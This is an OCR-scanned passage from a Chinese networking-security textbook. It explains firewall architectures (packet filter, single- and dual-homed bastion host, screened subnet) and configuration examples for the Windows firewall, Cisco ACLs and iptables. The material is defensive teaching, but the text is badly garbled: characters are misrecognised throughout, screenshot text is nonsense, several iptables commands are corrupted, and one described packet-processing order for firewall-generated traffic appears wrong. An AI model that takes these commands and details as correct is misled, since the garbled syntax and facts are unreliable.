火 墙 可 基本 满足 内 部 主机 访问 外 部 网 络 的 安全 需求 。 此 种 结构 的 主要 弱点 在 于 路 由 器 ， 
如 果 路 由 器 被 入 侵 , 则 整个 内 部 网 络 将 受到 威胁 。 











图 7-10 单一 包 过 滤 防 火 墙 结构 


2. 单 穴 堡垒 主机 结构 
单 穴 堡垒 主机 结构 (图 7-11) 增 加 了 堡垒 主机 的 角色 ,堡垒 主机 实际 是 扮演 代理 防火 
墙 的 角色 , 单 穴 指 堡垒 主机 仅 有 一 个 接口 。 






堡垒 主机 
192.168.0.2 





202.11.1.150 


192.168.0. 


无 状 


图 7-11 单 穴 堡垒 主机 结构 


堡垒 主机 需要 具备 的 功能 主要 有 : 

(1) 高 可 靠 性 和 高 安全 性 ,硬件 结构 和 操作 系统 都 必须 是 安全 的 ,难以 被 攻击 
(2) 不 同 的 应 用 层 代 理 相互 独立 ,可 以 动态 增删 ; 

(3) 具有 用 户 认 证 功能 ; 

(4) 具有 访问 控制 功能 ,确定 网 络 访问 范围 ; 
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(5) 详尽 的 日 志和 审计 记录 功能 。 


单 穴 堡 牟 主机 结构 将 包 过 滤 防 火 墙 的 1 号 接口 配置 为 只 接收 来 自 堡 参 主 机 的 报 文 并 
只 发 送 目标 是 堡 艰 主机 的 报 文 , 强 制 所 有 内 部 网 络 与 外 部 网 络 的 通信 只 能 通过 堡垒 主机 
转发 。 堡 又 主机 可 以 在 应 用 层 监 控 内 部 网 络 与 外 部 网 络 的 全 部 通信 。 

攻击 者 单独 攻击 包 过 滤 防 火 墙 无 法 对 内 部 网 络 造成 威胁 ,只 能 修改 包 过 滤 规 则 阻 断 
与 保佑 主机 的 通信 ,从 而 阻 断 内 部 网 络 与 外 部 网 络 联系 。 如 果 内 部 主机 已 经 明确 设置 通 
过 代理 访问 外 部 网 络 ,那么 攻击 者 即使 修改 过 滤 规 则 也 无 法 直接 与 内 部 网 络 通信 ,必须 进 
一 步 攻击 堡 参 主机 才能 奏效 ,因此 该 体系 结构 相对 于 单一 包 过 滤 防 火 墙 有 更 高 的 安全 性 。 
该 类 结构 的 主要 问题 是 ,堡垒 主机 直接 暴露 在 攻击 者 面前 ,一 旦 煲 人 又 主机 被 攻陷 ,整个 内 
部 网 络 则 受到 威胁 。 

3. 双 穴 堡垒 主机 结构 

双 穴 堡垒 主机 结构 (图 7-12) 无 须 在 包 过 滤 防 火 墙 做 规则 配置 , 即 可 人 迫使 内 部 网 络 与 
外 部 网 络 的 通信 经 过 堡垒 主机 ,避免 了 包 过 滤 防 火 墙 失效 导致 内 部 网 络 可 能 与 外 部 网 络 
直接 通信 的 情况 。 双 穴 指 具有 两 个 接口 ,堡垒 主机 同时 连接 两 个 不 同 网 络 。 即 使 包 过 滤 
防火 墙 出 现 问题 ,内 部 网 络 和 外 部 网 络 之 间 的 通信 链 路 也 必须 经 过 堡垒 主机 ,而 单 穴 保健 
主机 结构 可 能 会 因为 内 部 主机 没有 明确 设置 代理 ,导致 被 攻击 者 绕 过 堡垒 主 机 直接 攻击 ， 
因此 双 穴 堡 参 主机 结构 相 比 单 穴 堡垒 主机 结构 安全 性 更 高 ,攻击 者 只 有 通过 堡垒 主机 和 
包 过 滤 防 火 墙 两 道 屏障 才能 够 成 功 。 





无 状态 包 过 滤 
堡 华 主机 防火 墙 







图 7-12 ”双人 穴 堡垒 主 机 结构 
4. 屏蔽 子 网 结构 


屏蔽 子 网 结构 (图 7-13) 进 一 步 根据 安全 等 级 将 内 部 网 络 划分 为 不 同 子 网 ,内 网 1 的 
安全 系数 更 高 ,攻击 者 如 果 想 人 侵 内 网 1, 必 须 人 侵 两 个 包 过 滤 防 火 墙 及 一 台 堡 又 主机， 


内 网 包 过 滤 防 火 墙 





图 7-13 屏蔽 子 网 结构 
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攻击 成 功 的 难度 系数 极 大 增加 。 内 网 2 可 以 理解 为 准 军事 区 域 (Demilitarized Zone， 
DM2) ,将 内 网 1 和 外 部 网 络 隔 开 ,充当 内 网 1 和 外 部 网 络 的 缓冲 区 ,攻击 者 要 想 进 入 内 
网 1 必须 穿 过 内 网 2, 此 时 攻击 者 被 发 现 的 概率 会 极 大 增加 。 这 种 结构 具有 很 高 的 安全 
性 ,因此 被 广泛 采用 。 


7.2.4 防火 墙 的 缺点 


尽管 防火 墙 提供 了 较 丰 富 的 安全 功能 ,但 是 它 并 非 万 能 ,无 法 解决 所 有 的 安全 问题 。 
防火 墙 也 存在 不 少 缺陷 : 

(1) 不 能 防范 不 经 过 防火 墙 的 攻击 。 如 果 允 许 某 内 部 主机 绕 过 防火 墙 直 接 访问 外 部 
系统 ,那么 攻击 者 通过 该 主机 展开 攻击 ,防火 墙 就 无 能 为 力 。 

(2) 不 能 防范 来 自 内 网 的 攻击 。 对 于 发 生 在 内 部 网 络 不 同 主机 间 的 攻击 行为 ,防火 
墙 无 能 为 力 。 

(3) 不 能 防范 病毒 ,后门 ,木马 和 数据 驱动 攻击 。 出 于 性 能 考虑 ,防火 墙 只 分 析 部 分 
的 高 层 协 议 头 部 数据 ,具体 的 内 容 分 析 和 识别 依赖 于 入 侵 防御 系统 和 反 病毒 软件 。 

(4) 只 能 防范 已 知 威胁 ,难以 防御 新 的 威胁 。 防火墙 可 以 根据 已 有 攻击 编写 针对 性 
的 安全 规则 或 访问 控制 策略 ,规则 集 制定 后 就 不 会 改变 ,无 法 防范 新 威胁 。 


7.3 防火 墙 软件 实例 


Linux 下 的 iptables 软件 防火 墙 和 CISCO 路 由 器 的 ACL 列表 均 部 分 支持 有 状态 的 
包 过 滤 ,Windows 自 带 的 防火 墙 属 于 有 状态 包 过 滤 防 火 墙 结合 系统 进程 的 访问 控制 策 
略 , 上 述 包 过 滤 软 件 防 火 墙 依赖 底层 操作 系统 支持 ,需要 在 主机 上 安装 运行 配置 后 才能 
使 用 。 

CCProxy 既 可 以 作为 应 用 层 网 关 , 也 可 以 作为 传输 层 代 理 (Socks) ,而 MITM Proxy 
和 BurpSuite 等 常见 代理 都 属于 应 用 层 网 关 。 


7.3.1 Windows 个 人 防火 墙 


本 节 以 Windows 7 系统 自 带 的 个 人 防火 墙 为 例 说 明 有 状态 包 过 滤 防 火 墙 结合 操作 
系统 的 访问 控制 实现 对 于 主机 的 防护 。 最 基本 的 配置 方式 是 基于 操作 系统 程序 文件 的 访 
问 控制 (图 7-14) , 即 允 许 哪些 程序 直接 通过 防火 墙 不 用 接受 检查 。 

Windows 防火 墙 把 规则 分 为 入 站 规则 和 出 站 规则 ,每 条 规则 可 用 于 企业 域 .专用 网 
和 公用 网 三 种 配置 文件 (profile) ,三 种 配置 文件 分 别 用 于 不 同 的 网 络 接口 。 需 要 注意 的 
是 ,Windows 个 人 防火 墙 的 入 站 规则 ,针对 TCP 报 文 仅 检查 接 和 人 的 TCP 连接 请 求 是 否 
符合 规则 ,对 于 连接 建立 后 的 数据 传递 报 文 不 做 任何 检查 。 例 如 ,建立 一 条 入 站 规则 阻止 
针对 Netcat 程序 的 入 站 连接 ,并 不 影响 使 用 Netcat 程序 访问 网 络 中 的 其 他 主机 。 对 于 
UDP 协议 的 报 文 , 则 每 个 人 站 报 文 都 做 检查 。 

高 级 方式 则 是 通过 控制 面板 中 防火 墙 的 “高 级 设置 ?实现 ,如 图 7-15 所 示 。 默 认 情 况 
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图 7-14 Windows 防火 墙 配 置 允许 程序 


下 ,防火 墙 不 阻止 从 接口 发 出 的 报 文 , 即 出 站 规则 默认 都 是 允许 ,如 果 入 站 规则 不 匹配 从 
接口 收 到 的 报 文 , 则 报 文 默认 被 拒绝 。 这 就 是 一 种 实现 包 过 滤 防 火 墙 的 默认 规则 的 方法 ， 
在 出 、 入 站 的 不 同方 向 设置 不 同 的 默认 规则 。 





哈 高 级 安全 Windows 防火 增 为 Winaows 计算 机 提供 网 络 安全 。 


域 配置 文件 

加 Windors 防火 墙 已 启用 。 

® 阳 上 上 与 规 风 不 PE 的 入 站 连接 * 
加 区 许 与 规 则 不 PE 的 出 站 连接 。 
专用 配置 文件 

移 Windors 防火 墙 已 自用 。 

@ 阻止 与 规 MI 下 EGR 的 入 站 活 接 。 
加 人 ti 六 与 栅 风 不 Pa 的 出 站 连接 。 
公用 配置 文件 是 活动 的 

加 Windors 防火 墙 已 启用 。 

阻止 与 规 刚 不 Pr 本 的 入 站 连接 。 
人 @@ 允许 与 规 由 PE 的 出 站 连接 。 
加 inaors 防火 培 属 性 





























设置 
园 括 Yindows 防火 墙 行为 的 











指定 用 于 绛 难 解答 的 日 志 设 置 























| 到 | 


7-15 ”Windows 防火 墙 的 默认 规则 示例 
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每 条 规则 可 以 基于 端口 设置 ,也 可 以 基于 程序 名 设置 ,还 可 以 基于 Windows 提供 的 
预定 义 名 称 设置 ,使 用 自 定 义 规则 可 以 同时 基于 端口 和 程序 名 进行 设置 (图 7-16) 。 





目 程序 吕 ) 
控制 


上 七 Do 

控制 TCF 或 端口 连接 的 规则 。 
司马 定义 轨 : 

[iscsr 服务 

控制 Windors 体验 功能 连接 的 规则 
局 自 定义 (CC) 

自 定义 规则 。 








Cr EDo 

















图 7-16 Windows 防火 墙 支持 的 规则 类 型 


图 7-17 一 图 7-22 示例 了 一 条 自 定义 规则 的 创建 过 程 ,创建 完毕 后 在 防火 墙 规则 列表 
中 新 增 一 项 名 为 “netcat_test” 的 入 站 规则 (图 7-23) ,只 允许 外 部 主机 使 用 TCP 的 2000 一 
3000 端口 或 80 端口 连接 192. 168. 2. 100 地 址 的 某 个 端口 ,并 且 该 端口 由 程序 nc 开启 并 
监听 ,该 规则 不 影响 使 用 nc 程序 作为 客户 端 向 其 他 主机 发 起 连接 。 


该 规则 应 用 于 所 有 程序 还 是 特定 程序 ? 


由 所 有 程序 4) 
规则 应 用 于 与 其 他 规则 属性 相 匹 配 的 计算 机 上 的 所 有 和 连接 * 


加 此 程序 路 径 ID) - 
D:\ 工 作 目录 \neat\ne exe 


示例 :path\grogran_ exe 
WErogranFilesyNbrowserVbrowser exe 








服务 
指定 应 用 该 规 风 的 9 服务 。 














[4 上 =- 步 @) ] | 下 =- 步 >] | 到 消 








7-17 自 定义 规则 的 程序 名 
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图 7-18 自 定义 规则 的 端口 策略 


此 规则 应 用 于 哪些 本 地 IT 地址 ? 
咎 任何 莫 地 直 D) 
辕 下 列 理 地 址 加 


1 1 2100 ET 









































上 - 步 划 | 下- 步 四 >)| 取向 | 

















图 7-19 自 定义 规则 的 IP 策略 


连接 符合 搁 定 条 件 时 应 该 进行 什么 扩 作 ? 


二 允许 连接 CA) 
这 包括 使 用 IPsec 保护 以 及 未 使 用 IPsec 保护 的 连接 < 


全 只 允许 安全 连接 人 ) 
区 IPzec ¥ 入 。 使 用 Ises 属性 中 的 设置 以 及 连 按 安 


自 定义 0) 


个 阻止 连接 x) 
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7-20 自 定义 规则 的 动作 
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何 时 应 用 该 规 WN? 


回 域 @) 

计算 机 连接 到 其 企业 HH 让 用 
专用 外) 

计算 机 这 接 到 专用 网 络 位 置 时 应 用 


国 公 用 CD 
计算 机 连接 到 公用 网 结 位 置 时 应 用 。 


r= TT 





图 7-21 指定 自 定义 规则 作用 的 接口 


名 入 四 
matesttont 
扬 述 器 选 ) @) 


his is «ent 











《上 = 步 @) ] REY | RN] 








图 7-22 为 自 定义 规则 命名 






























































a 配置 文件 ”已 启用 。 统 作 。 项 代 程序 。 本 地 地 址 。 远程 地 址 。 协议 
@ PacketTracer6 一 ~ cr 
© PacketTracer . 全 侣 
© PacketTracer Me 
@ PacketTracer 有 9 i 
ee 天 任何 Upp 
Bos 理 任何 Tcp 
@ QQMusicM 理 任何 UDP 
@ QQMusicM 否 任何 Upp 
CS 理 任何 Tcp 
a 香 人 E 癌 任何 
Be 至 EE Tcp 
天 人 阿 UDP 
Oi 否 任何 UDP 
- 理 任何 Tcp 
3 ss 天 任何 任何 
Bs 否 任何 UDP 
@ QzoneMusic 于 
4 i 天 任何 Tcp 
Se 天 任何 Tcp 

天 任何 UDP 

于 ea 
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7.3.2 CISCO ACL 列表 


CISCO 路 由 器 支持 IP 报 文 过 滤 功 能 ,使 用 访问 控制 列表 (ACL) 实 现 包 过 滤 防 火 墙 
的 功能 。 配 置 ACL 分 为 两 步 : 四 定义 ACL 规则 ; 四 指明 规则 应 用 的 具体 接口 和 出 人 该 
接口 的 方向 。 同 一 条 ACL 可 以 用 于 多 个 不 同 接口 的 不 同方 向 。ACL 分 为 标准 ACL 和 
扩展 ACL, 其 中 标准 ACL 仅 基 于 报 文 的 源 IP 地 址 控制 ,而 扩展 ACL 可 以 基于 服务 控 
制 ,每 条 ACL 可 以 用 数字 或 者 名 字 表 示 ,ACL 的 匹配 原则 如 下 : 

(1) 每 个 接口 的 每 个 方向 只 能 设置 一 条 ACL。 

(2) ACL 中 的 规则 集合 按 顺 序 逐 条 匹配 ,找到 第 一 条 匹配 的 规则 就 立即 执行 该 规则 
定义 的 动作 ,并 停止 剩余 规则 的 匹配 。 

(3) ACL 的 默认 规则 为 拒绝 所 有 , 即 如 果 报 文 不 匹配 ACL 中 的 任何 规则 , 则 该 报 文 
被 丢弃 。 

1. 标准 ACL 

标准 ACL 的 数字 范围 在 1 一 99 ,规则 可 设置 的 动作 为 允许 和 拒绝 ,接口 方向 设置 为 
in 或 out。 判 定 IP 地 址 所 属 网 络 的 方式 是 使 用 网 络 掩 码 的 反 码 实 现 ,其 具体 语法 如 下 : 

(config)# access 一 list <1- 99> {permit|deny} 源 地 址 [网 络 掩 码 的 反 码 ] 

应 用 ACL 到 接口 的 具体 语法 如 下 : 

(config— if)# ipaccess— group <1—99> {in | out} 

图 7-24 给 出 了 一 个 标准 ACL 示例 , 仅 拒 绝 来 自 172. 16. 4.0 网 段 的 所 有 报 文 ,并 将 


其 用 在 E0 接口 的 出 方向 。 结 果 是 ,除了 172. 16. 3. 0 网 络 不 能 与 172. 168. 4. 0 进行 通信 

以 外 ,所 有 其 他 通信 都 畅通 无 阻 。 

172 8 0 172.16.4.0 rl(config)# access-list 1 deny 172.16.4.0 0.0.0.255 
rl(config)# access-list 1 permit any /注意 规则 的 顺序 

172.16.4.13 rl(config)# interface ethernet 0 


172.16.3.0 







rl(config-if)# ip access-group 1 out 
和 


图 7-24 标准 ACL 应 用 示例 


2. 扩展 ACL 

扩展 ACL 可 以 基于 包 的 IP 地 址 .端口 号 和 协议 号 进行 过 滤 。 同 时 , 它 支 持 TCP 的 
部 分 状态 过 滤 , 可 以 使 用 “established” 标 记 报 文 为 连接 建立 后 的 报 文 ,从 而 可 以 区 分 TCP 
连接 请 求 和 TCP 数据 报 文 。 扩 展 ACL 的 具体 配置 语法 如 下 : 


(config) #access 一 list {100 - 199} {permit | deny} 协议 号 源 地 址 [网络 掩 码 的 反 码 ] [操作 符 
操作 数 ] 

目标 地 址 [网络 掩 码 的 反 码 ] [操作 符 操作 数 ] [established] 

(config— if)# ipaccess— group <100-199> {in | out} 


还 是 以 图 7-24 为 例 ,扩展 ACL 的 示例 配置 如 下 : 
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// 人 允许 所 有 与 21 端口 建立 连接 后 的 报 文通 过 

Rl(config)# access— list 101 permit tcp any any eq 21 established 

Rl(config)# access— list 101 permit tcp any any eq 20 established 

// 禁 止 与 21 端口 建立 连接 ,注意 与 第 一 条 规则 的 先后 顺序 

Rl(config)# access— list 101 deny tcp 172.16.4.0 0.0.0.255 172.16.3.0 0.0.0.255 eq 21 

Rl(config) # access— list 101 deny tcp 172.16.4.0 0.0.0.255 172.16.3.0 0.0.0.255 eq 20 

Rl(config) # access- list 101 permit ip any any // 人 允许 其 他 所 有 IP 报 文 

Rl(config) # interface ethernet 1 

Rl(config— if)# ip access - group 101 in 

该 扩展 ACL 拒绝 172. 16. 4. 0 网 络 访问 172. 16. 3. 0 网 络 的 21 和 20 端口 , 即 FTP 服 
务 , 允 许 其 他 所 有 的 IP 报 文 ,并 且 将 该 ACL 应 用 在 El 接口 的 入 方向 ,结果 是 172. 16. 4.0 
除了 无 法 访问 172. 16. 3. 0 的 FTP 服务 之 外 ,其 他 网 络 通信 均 不 受 影响 。 这 里 “eq” 操作 
符 指 * 等 于 ”, 可 以 使 用 "gt 表示 大 于 某 个 端口 ,“le" 表 示 小 于 等 于 某 个 端口 ,用 于 指明 中 
口 范围 。 


7.3.3 iptables 


在 Linux 系统 中 ,Netfilter/iptables 应 用 程序 用 于 实现 防火 墙 、 网 络 地 址 转换 和 报 文 
分 割 等 功能 。 其 中 Netfilter 工作 在 内 核 ,iptables 提供 用 户 接口 允许 用 户 自 定义 规则 集 
合 。iptables 主要 包括 三 张 规则 表 , 称 为 Filter.NAT 和 Mangle, 分 别 对 应 上 述 三 种 功 
能 。Filter 表 用 于 报 文 过 滤 ,也 就 是 实现 包 过 滤 防 火 墙 功能 ; NAT 表 用 于 实现 内 部 网 络 
和 外 部 网 络 地 址 转换 ,也 可 用 于 报 文 的 端口 转发 ， Mangle 表 用 于 修改 报 文 的 内 容 , 但 是 
不 包括 源 和 目标 的 IP 地 址 和 端口 等 信息 。 

Filter 表 是 默认 使 用 的 表 , 由 三 条 规则 链 组 成 ,分 别 是 INPUT、FORWARD 和 
OUTPUT,INPUT 链 针 对 外 部 主机 发 给 防火 墙 接口 的 报 文 ; OUTPUT 链 针 对 从 接口 发 
出 的 报 文 ; FORWARD 指 源 和 目标 都 不 是 防火 墙 接口 的 报 文 ,只 是 由 防火 墙 转发 。 每 条 
链 都 可 以 自行 设置 默认 策略 ,规则 匹配 的 顺序 按照 在 链 中 的 先后 顺序 进行 ,找到 第 一 条 匹 
配 的 规则 就 结束 匹配 并 执行 该 规则 定义 的 动作 ,如 果 在 链 中 没有 找到 匹配 的 规则 , 则 执行 
默认 策略 。Filter 表 中 的 规则 定义 默认 动作 包括 ACCEPT 和 DROP,ACCEPT 表示 接受 
报 文 .DROP 表示 丢弃 报 文 。 

NAT 表 用 于 改变 进出 iptables 的 报 文 的 源 和 目标 IP 以 及 源 和 目标 端口 , 它 的 四 条 
链 分 别 是 PREROUTING、INPUT、OUTPUT 和 POSTROUTING,PREROUTING 用 
于 在 报 文 进入 防火 墙 接口 修改 它 的 目标 地 址 ,相当 于 让 报 文 进入 内 部 网 络 时 将 目标 地 址 
修改 为 对 应 的 内 部 网 络 地 址 ; INPUT 用 于 修改 目标 地 址 是 防火 墙 自身 的 报 文 的 源 地 址 ; 
OUTPUT 用 于 修改 防火 墙 主 机 自身 从 接口 发 出 的 报 文 的 目标 地 址 ; POSTROUTING 
在 把 报 文 从 接口 发 出 去 之 前 改变 报 文 的 源 地 址 ,相当 于 让 报 文 进入 外 部 网 络 之 前 将 源 地 
址 修改 为 相应 的 防火 墙 的 外 部 网 络 接 口 地 址 。NAT 表 中 规则 的 动作 可 以 是 SNAT、 
DNAT 和 REDIRECT,SNAT 用 于 改变 源 地 址 和 源 端口 , DNAT 用 于 改变 目标 地 址 和 目 
标 端 口 ,REDIRECT 用 于 改变 源 和 目标 端口 。 

Mangle 支持 五 条 规则 链 , 即 INPUT、OUTPUT、PREROUTING、POSTROUTING 
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和 FORWARD,PREROUTING 和 POSTROUTING 链 的 使 用 方式 与 NAT 表 相 同 ,只 
是 Mangle 的 规则 链 用 于 修改 报 文 的 其 他 报 文 内 容 ; INPUT .OUTPUT 和 FORWARD 
链 的 使 用 方式 与 Filter 表 相同 。 

报 文 在 iptables 的 流动 过 程 如 图 7-25 所 示 。iptables 的 处 理 顺 序 分 为 三 种 情况 。 


进入 接口 


Mangle 表 的 PREROUTING 链 


了 
NAT 表 的 PREROUTING 和 链 


Mangle 表 的 INPUT 链 本 机 一 两 定 目标 地 二 >> 外 部 -| ”Mangie 表 的 FORWARD 链 


NAT 表 的 INPUT 链 












































Filter 表 的 INPUT 链 


本 地 处 理 


Mangle 表 的 OUTPUT 链 


1 


NAT 表 的 OUTPUT 链 














Filter 表 的 FORWARD 链 


Filter 表 的 OUTPUT 链 

















Mangle 表 的 POSTROUTING 链 





NAT 表 的 POSTROUTING 链 


Tomet 


从 接口 发 出 




















7-25 ”iptables 的 报 文 处 理 顺序 


(1) 针对 以 防火 墙 接口 IP 地 址 为 目标 地 址 的 报 文 处 理 顺 序 为 : Mangle 表 的 
PREROUTING 链 ; @NAT 表 的 PREROUTING 链 ; 四 判定 报 文 目 标 地 址 属于 本 地 接 
口 ; 四 Mangle 表 的 INPUT 链 ; ONAT 表 的 INPUT 链 ; @Filter 表 的 INPUT 链 。 

(2) 针对 目标 地 址 为 其 他 主机 的 报 文 处 理 顺序 为 : DMangle 表 的 PREROUTING 
链 ; @NAT 表 的 PREROUTING 链 ; @ 判 定 报 文 目标 地 址 不 属于 本 地 接口 ; @Mangle 
表 的 FORWARD 链 ; @Filter 表 的 FORWARD 链 ; @Mangle 表 的 POSTROUTING 
链 ; DNAT 表 的 POSTROUTING 链 。 

(3) 针对 防火 墙 自身 产生 的 报 文 处 理 顺序 为 : Mangle 表 的 PREROUTING 链 ; 
@NAT 表 的 PREROUTING 链 ; @Mangle 表 的 FORWARD 链 ; @Filter 表 的 FORWARD 
链 ; Mangle 表 的 POSTROUTING 链 ; @NAT 表 的 POSTROUTING 链 。 
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用 iptables 命令 设置 的 规则 在 设置 后 立即 生效 ,但 是 系统 重启 后 丢失 。 如 果 需 要 让 
规则 一 直 存在 ,需要 使 用 保存 命令 。 一 种 方法 是 使 用 “service iptables save” 命 令 保存 于 
默认 配置 文件 “/etc/sysconfig/iptables” 中 ,系统 重启 后 会 自动 执行 “service iptables 
reload" 命 令 加 载 此 文件 的 设置 将 规则 装 人 内存 。 另 一 种 方法 是 使 用 "iptables-save 一 文 
件 名 ”命令 存 和信 自 定义 文件 ,系统 重启 后 手动 使 用 “iptables-restore 习 文件 名 ”将 自 定义 文 
件 中 保存 的 规则 装 入 内 存 。 

每 条 规则 的 抽象 文法 如 下 : 

iptables [ -t+t 表 名 ] { 子 命令 } [匹配 条 件 ] - j 动作 

表 名 默认 是 filter, 可 以 是 filter、nat、mangle。 

子 命令 主要 用 于 指明 具体 链 和 规则 ,主要 包括 针对 链 的 命令 和 针对 规则 的 命令 。 针 
对 链 的 命令 主要 包括 : 

(1) -下 [ 链 名 ]: 清空 指定 表 的 指定 链 上 的 所 有 规则 ,如 果 不 指明 链 名 , 则 清空 指定 表 
中 的 所 有 链 ,但 是 不 影响 默认 策略 。 








iptables -tnat -FPOSTROUTING 。 // 删 除 nat 表 的 POSTROUTING 链 的 所 有 规则 
(2) -P 链 名 策略 名 : 设置 链 的 默认 策略 ,可 用 策略 是 ACCEPT .DROP 、REJECT。 


iptables —P INPUT DROP 


(3) -N 链 名 : 新 建 用 户 自 定义 的 链 , 自 定义 链 只 能 作为 默认 链 上 的 跳 转 对 象 ,通过 
在 默认 链 中 引用 来 使 自 定义 链 生效 ,在 自 定义 链 匹配 后 可 以 跳 转 回 某 个 内 置 链 继续 过 滤 。 

(4) -X 链 名 : 删除 用 户 自 定义 的 空 链 , 非 空 自 定义 甸 和 内 置 链 无 法 删除 。 

(5) -EE 旧 链 名 新 链 名 : rename, 重 命名 自 定义 链 , 被 引用 中 的 自 定 义 链 无 法 改名 。 

针对 规则 的 命令 主要 包括 : 

(1) -A 链 名 : 在 指定 链 的 尾部 增加 一 条 规则 。 

iptables — A INPUT …… 

(2) -I 链 名 索引 : 在 指定 链 的 指定 位 置 插入 一 条 规则 。 

iptables -IINPUT 1 -- dport 80 一 j ACCEPT // 规 则 索引 默认 从 1 开始 ,将 新 规则 放 在 链 的 头 部 

(3) -D: 删除 指定 的 规则 ,可 以 删除 具体 的 规则 ,也 可 以 根据 索引 删除 。 

iptables -D INPUT -- dport 80 - j DROP 或 iptables -D INPUT 1 

(4) -R 链 名 规则 索引 : 蔡 换 指 定 的 规则 。 

(5) -L 链 名 : 列 出 指定 链 上 的 所 有 规则 。 

。-n: 以 数字 格式 显示 地 址 和 端口 号 ; 

。-v: 详细 格式 ,显示 规则 的 详细 信息 ; 

。 -vv: 比 v 更 详细 ; 

® -VVV: 比 vv 更 详细 ; 

。 --line-numbers: 显示 规则 编号 。 
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iptables -tnat -L -vv --line-numbers -ny// 显 示 nat 表 中 的 所 有 链 的 所 有 规则 信息 

防火 墙 规则 的 匹配 条 件 分 为 通用 匹配 和 扩展 匹配 ,支持 正 向 或 反 向 匹配 。 通 用 匹配 
条 件 主要 包括 : 

(1) [1] -s,--src,--source 主机 或 网 络 地 址 : 检查 报 文 的 源 IP 地 址 。 


iptables — A INPUT -- source 192.168.1.0/24 

(2) [1] -d,--dst,--destination 主机 或 网 络 地址 : 检查 报 文 的 目标 IP 地 址 。 

iptables — A OUTPUT! —— dst 192.168.1.0/24 

(3) [1!J-p,--protocol 协议 名 : 检查 IP 报 文 的 协议 字段 标识 的 协议 ,如 TCP、UDP 或 
ICMP 等 。 


(4) [1J-i,- -in-interface 接口 名 : 指明 报 文 的 流入 接口 ,用 于 PREROUTING、 
INPUT 和 FORWARD 链 。 


iptables — A INPUT! -一 in- interface eth0 


(5) [1J-0,- -out-interface 接口 名 : 指明 报 文 的 流出 接口 ,用 于 FORWARD、 
OUTPUT 和 POSTROUTING 链 。 


iptables — A FORWARD — o eth0 
(6) [1 全 -f,--fragment: 只 匹配 分 片 报 文 的 第 二 片 至 最 后 一 片 。 
iptables — A FORWARD 一 o eth0 一 于 


扩展 匹配 条 件 分 为 隐 式 扩展 匹配 和 显 式 扩展 匹配 。 隐 式 扩展 匹配 主要 包括 UDP、 
TCP 和 ICMP 协议 的 匹配 条 件 。 

(1) -p {tcp | udp)》{--sport | --source-port) [1] 端 口号 [: 端 口号 ]: 指明 具体 的 TCP 
或 UDP 协议 的 源 端 口号 或 者 源 端 口 范 围 。 


iptables -RAINPUT -ptcp --sport 22:80  // 匹 配 22~80 的 所 有 TCP 端口 


(2) -p {tcp | udp) !{--dport | --dource-port) [1] 端 口号 [: 端 口号 ]: 指明 具体 的 
TCP 或 UDP 协议 的 目标 端口 号 或 者 目标 端口 范围 。 

(3) -p tcp --tcpflags: 匹配 指定 的 TCP 标记 。 它 有 两 个 列表 参数 ,列表 内 部 用 英文 
的 逗号 作为 分 隔 符 ,两 个 列表 之 间 用 空格 分 开 。 第 一 个 参数 指定 iptables 检查 的 标记 ( 作 
用 像 掩 码 ); 第 二 个 参数 指定 “在 列表 1 中 出 现 的 ,并 且 必 须 设 置 为 1 的 ”标记 ,同时 列表 1 
中 其 他 的 标记 必须 设置 为 0。 也 就 是 说 ,列表 1 提供 检查 范围 ,列表 2 提供 设置 条 件 ( 即 
被 检查 的 标记 中 哪些 设置 为 1) 。 该 操作 可 以 识别 的 标记 名 是 SYN、ACK、FIN、RST、 
URG 和 PSH, 以 及 两 个 通配符 ALL 和 NONE,ALL 指 所 有 的 标记 ,NONE 指 未 选 定 任 
何 标记 。 也 可 以 在 参数 前 加 感叹 号 表示 取 反 。 





//SYN 表示 匹配 SYN 标记 为 1 而 FIN 和 RaCK 标 记 位 0 的 报 文 ,各 标记 之 间 只 有 一 个 逗号 而 没有 空格 
一 p tcp -一 tcp 一 flags SYN,FIN,ACK SYN 
一 p tcp —- tcp— flags ALL NONE // 匹 配 所 有 标记 都 为 0 的 报 文 
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//SYN 表示 不 匹配 那些 FIN 和 ACK 标记 为 0 而 SYN 标记 为 1 的 报 文 
iptables -ptcp -- tcp— flags ! SYN,FIN,ACK SYN 


(4) -p icmp --icmp-type: 根据 ICMP 类 型 匹配 报 文 , 类 型 可 以 使 用 十 进 制 数值 或 相 
应 的 名 字 , 数 值 遵循 RFC792 中 的 定义 ,名 字 可 以 用 命令 “iptables --protocol icmp --help” 
查看 。 该 匹配 可 以 用 感叹 号 取 反 ,如 “--icemp-type ! 8” 表 示 匹 配 ICMP 类 型 不 是 8 的 所 有 
ICMP 报 文 。 


iptables — A INPUT —p icmp —— icmp— type 8 
显 式 匹配 必须 使 用 -m 或 --match 选项 指明 ,主要 有 性 能 限制 .MAC 地 址 匹配 、 多 个 
端口 匹配 .TTL 匹配 和 状态 匹配 等 。 
(1) -m limit: 限制 防火 墙 规则 ,平均 单位 时 间 能 匹配 多 少 报 文 ,以 及 单位 时 间 最 多 匹 
配 多 少 报 文 ,使 用 该 选项 可 以 对 指定 规则 的 日 志 数量 加 以 限制 。 
。--limit: 设置 平均 匹配 速率 ,语法 为 数值 加 时 间 单 位 ,时 间 单 位 可 以 是 /second / 
minute /hour /day ,默认 值 是 平均 每 20 分 钟 一 次 , 即 3/hour。 
iptables -R INPUT -mlimit -- limit 3/hour ”//INPUT 链 的 每 条 规则 每 20 分 钟 匹配 一 次 
，--limit-burst: 设置 最 大 匹配 速率 ,在 单位 时 间 内 最 多 可 匹配 多 少 报 文 Climit- 
burst 的 值 要 比 --limit 的 大 ); 
iptables — A INPUT —m limit -- limit 3/second -- limit— burst 5 
(2) -m multiport: 指明 多 个 非 连续 的 源 和 目标 端口 。 
。 --source-port,--sports: 多 个 源 端口 匹配 ,最 多 可 以 指定 15 个 端口 ,逗号 分 隔 并 
且 中 间 没 有 空格 ,使 用 时 必须 有 -p tcp 或 -p udp 为 前 提 条 件 。 
iptables — A INPUT ~ p tcp ~ mmultiport -- Source 一 port 22,53,80,110 
。 --destination-port,--dports: 多 个 目的 端口 匹配 ,使 用 方法 和 多 个 源 端 口 匹配 相同 。 
iptables — A INPUT ~ p tcp 一 mmultiport -- destination~ port 22,53,80,110 


。 --port: 多 个 同 端口 匹配 , 它 匹配 的 是 源 端 口 和 目的 端口 相同 的 报 文 ,如 端口 80 
到 端口 80 的 报 文 , 使 用 方法 和 多 个 源 端 口 匹配 相同 。 


iptables 一 A INPUT -Ptcp 一 mmultiport —— port 22,53,80,110 

(3) -m ttl --ttl 数值 : 匹配 报 文 的 TTL 选项 值 。 

iptables — A OUTPUT 一 mttl -一 ttl 60 

